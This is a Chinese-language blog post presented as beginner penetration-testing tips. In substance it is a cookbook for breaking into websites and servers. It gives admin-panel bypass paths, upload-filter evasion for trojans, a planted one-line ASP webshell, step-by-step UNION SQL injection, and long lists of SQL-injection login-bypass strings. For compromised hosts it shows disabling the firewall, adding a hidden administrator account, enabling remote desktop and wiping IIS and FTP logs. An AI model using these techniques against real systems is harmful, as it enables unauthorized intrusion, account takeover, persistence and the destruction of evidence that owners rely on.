给刚接触网络安全的小伙伴分享一些渗透测试入门基础知识~

博主:秋蝉秋蝉 3年前 (2021) 1.06 W 0条评论

 1.某些cms的网站设置过滤不严,直接在网站后面加上admin/session.asp 或 admin/left.asp 可以绕过后台验证直接进去后台。

2.提下服务器之后建议抓下管理员哈希值,然后删除所有用户包括自己的,以后登录这台服务器就用管理员的账号密码登录,这样比较安全。

3.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门。

4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选--查看即可直接进入后台。

5.突破防盗链系统访问shell代码:javascript:document.write("<a href='http://www.xxx.com/uploadfile/1.asp'>fuck</a>") 点击GO即可进入shell。

6.遇到一流信息监控拦截系统时,上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。

7.eweb编辑器后台,增加了asp|asa|cer|PHP|aspx等扩展名上传时都被过滤了,尝试增加一个aaspsp,再上传asp就会解析了。

8.用注入工具猜解到表段却猜解不到字段的时候,到网站后台右键查看源文件,一般账号密码后面的就是字段,之后在注入工具里添加字段进行猜解即可。

9.当注入工具猜解表段,但猜解字段时提示长度超过50之类,不妨扔到穿山甲去猜解一下。

10.得知表段跟字段之后,使用SQL语句在ACCESS数据库里加个用户名及密码的语句:Insert into admin(user,pwd) values('jianmei','daxia')

11.当获得管理员密码却不知道管理员帐号时,到网站前台找新闻链接,一般“提交者”“发布者”的名字就是管理员的帐号了。

12.爆破ASP+IIS架设的网站web绝对路径,假设网站主页为:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

13.有的站长很懒什么也不改,当我们得知网站的cms的时候,不妨去下载一套找找数据库路径,以及敏感信息,再尝试默认相关的可利用资源。

14.菜刀里点击一句话木马右键,选择虚拟机终端,执行命令出现乱码时,返回去设置编码那里,将默认的GB2312改为UTF-8.

15.入侵千万别忘了ftp,试试诺口令,ftp的默认端口:21  默认帐号密码:test

16.破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可

17.好多网站的后台地址是:admin_index.asp manage_login.asp

18.有时在木马代码里加上了gif89a,上传成功访问的时候却出现了像图片一样的错误图像,说明服务器把gif89a当做图片来处理了,不要带gif89a即可。问就可以了。

19.找eweb编辑器的时候,如果默认的被改了,到前台去找图片右键看下路径,根据图片的目录猜eweb编辑器的目录,后台也是用此思路。

20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ 

21.扫旁站的时候,是不是想看每个站点是什么cms呢?用轩辕剑扫描就可以显示系统特征。

22.网站的主站一般都很安全,这时就要旁注或C段了,但是想知道各个IP段开放了什么端口吗?用“啊D网络工具包”里面的IP端口扫描最理想了。

23.手工检测注入点弹出“你的操作已被记录!”之类的信息,访问这个文件:sqlin.asp,如果存在,在注入点后面植入一句话木马:‘excute(request("TNT"))

接着用一句话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。

24.有的后台不显示验证码,往注册表里添加一个ceg即可突破这个困境了,把下面的代码保存为Code.reg,双击导入就可以了。

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]

"BlockXBM"=dword:00000000

25.内网渗透时尽量少登录3389,以免被管理员发现。


26.旁注的时候,建议挑PHP的站点来日,因为PHP站点一般都支持aspx脚本,这样对于提权跟跨目录都轻松!


手工注入

IE浏览器-工具-Internet选项-高级-显示友好http错误信息前面的勾去掉,否则不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的信息。

手工注入时如果网站过滤了 and 1=1  and 1=2 ,可以用xor 1=1  xor 1=2 进行判断。


第一步:找注入点

(数字型)http://www.xxx.com/show.asp?id=7

加'           程序报错

加and 1=1     返回正常页面

加and 1=2     返回错误页面


(字符型)http://www.xxx.com/show.asp?id=ade7

加'            程序报错

加'and '1'='1  返回正常页面

加'and '1'='2  返回错误页面


新型检测注入点的方法:

在URL地址后面加上-1,若返回的页面和前面不同,是另一个正常的页面,则表示存在注入漏洞,而且是数字型的注入漏洞。

在URL地址后面加上-0,若返回的页面和之前的页面相同,然后加上-1,返回错误页面,则也表示存在注入漏洞,而且是数字型的。


如果报错提示这个:

Microsoft JET Database Engine 错误 '80040e14'

语法错误 (操作符丢失) 在查询表达式 'ID = 6 ord by' 中。

/fun/Function.asp,行 657

 

解明:通过 JET 引擎连接数据库,则是 Access数据库,通过 ODBC 引擎连接数据库,则是 MSSQL数据库。

 

第二步:猜字段数

语句:order by 5

如果猜6的时候返回出错,就继续往回猜,直到返回正确为止...


第三步:UNION命令

语句:and 1=2 union select 1,2,3,4,5--

看看哪里可以替换,假如显示有2,就在2这里替换SCHEMA_NAME,见下


第三步:猜库名

语句:and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1


第四步:猜表段

语句:and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1

注意,TABLE_SCHEMA=后面的库名必须是hex转换过的格式,倒数第二个1一直替换,直到爆出所有表段,然后选最可能性的那个。


第五步:猜字段

and 1=2 union select 1,COLUMN_NAME,3,4,5 from  information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1

注意,TABLE_SCHEMA=后面的表段必须是hex转换过的格式,倒数第二个1一直替换,直到爆出所有字段,然后选最可能性的那两个。


第六步:猜内容

语句一:and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin

首先让程序报错,所以在注入点后面加上 and 1=2

语句二:http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin

同样是先让程序报错,在178这个参数前面加上 -

当列名帐号跟列名密码都猜解对的时候,页面将会显示相对应的内容,一般的密码都经过MD5加密了,然后去解密md5的网站去解密就可以了。 






基础知识


所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。

分享给大家、、 希望对大家有所帮助!

asp aspx万能密码

1:"or "a"="a

2:'.).or.('.a.'='.a 

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or.'a.'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'




admin'or 1=1#


PHP万能密码

admin'/*

密码*/'



'or 1=1/*


"or "a"="a

"or 1=1--

"or"="

"or"="a'='a

"or1=1--

"or=or"

''or'='or'

') or ('a'='a

'.).or.('.a.'='.a

'or 1=1

'or 1=1--

'or 1=1/*

'or"="a'='a

'or' '1'='1'

'or''='

'or''=''or''='

'or'='1'

'or'='or'

'or.'a.'='a

'or1=1--

1'or'1'='1

a'or' 1=1--

a'or'1=1--

or 'a'='a'

or 1=1--

or1=1--





通过该工具可以扫描常用的端口和指定的端口是否开放。 


常用端口号:

代理服务器常用以下端口:

(1). HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080

(2). SOCKS代理协议服务器常用端口号:1080

(3). FTP(文件传输)协议代理服务器常用端口号:21

(4). Telnet(远程登录)协议代理服务器常用端口:23

 

HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口);

HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp;

Telnet(不安全的文本传送),默认端口号为23/tcp(木马Tiny Telnet Server所开放的端口);

FTP,默认的端口号为21/tcp(木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口);

TFTP(Trivial File Transfer Protocol ),默认的端口号为69/udp;

SSH(安全登录)、SCP(文件传输)、端口重定向,默认的端口号为22/tcp;

SMTP Simple Mail Transfer Protocol (E-mail),默认的端口号为25/tcp(木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口);

POP3 Post Office Protocol (E-mail) ,默认的端口号为110/tcp;

WebLogic,默认的端口号为7001;

Webshpere应用程序,默认的端口号为9080;

webshpere管理工具,默认的端口号为9090;

JBOSS,默认的端口号为8080;

TOMCAT,默认的端口号为8080;

WIN2003远程登陆,默认的端口号为3389;

Symantec AV/Filter for MSE ,默认端口号为 8081;

Oracle 数据库,默认的端口号为1521;

ORACLE EMCTL,默认的端口号为1158;

Oracle XDB( XML 数据库),默认的端口号为8080;

Oracle XDB FTP服务,默认的端口号为2100;

MS SQL*SERVER数据库server,默认的端口号为1433/tcp 1433/udp;

MS SQL*SERVER数据库monitor,默认的端口号为1434/tcp 1434/udp;

QQ,默认的端口号为1080/udp





XP下双开3389的教程


用到的工具有 



xp3389.exe  termsrvhack.dll  3389.bat 这么几个文件



首先关他的防火墙


就在这里面输入   net stop sharedaccess  再回车就OK了



现在我们先把xp3389.exe  termsrvhack.dll这2个文件传个肉鸡  3389.bat这个要修该后再传的



再运行它。看操作

OK! the Tsenabled成功

再输入Tasklist/SVC >>c:\3389.txt


再肉鸡里面找到3389.txt文件本地打开DcomLaunch, TermService  把这些英文前面的数字记下来


然后返回本地找到  3389.bat


右键编辑  把原来的覆盖掉  保持OK  再传给肉鸡  并运行他


已经OK了。好我们看下能不能连接

  

1:net stop sharedaccess(关掉防火墙命令)

              2:Tasklist/SVC >>c:\3389.txt

              3:net user 1 1 /add 意思是建立一下用户名为1密码也为1的用户

              4:net localgroup administrators 1 /add 把1这个用户提升为管理员权限








日志位于/windows/system32/logfiles/w3svc1目录下!

    主要原因:

     C:\WINDOWS\system32\LogFiles文件夹下为系统日志统计文件,文件系统并不自动删除。

    处理方法:对日志文件进行合理的清理。    

    清理方法如下:

    找到c:/winnt/system32/logfiles/w3svc1目录下的文件,队保留最近的几个日志外,清理干净就可以了!!

    FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个。

    WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志。







强制登陆3389

mstsc /admin /v:IP:端口


1539238048111.jpeg

秋蝉博客www.100msh.net
The End

发布于:2021-01-13,除非注明,否则均为秋蝉'sblog原创文章,转载请注明出处。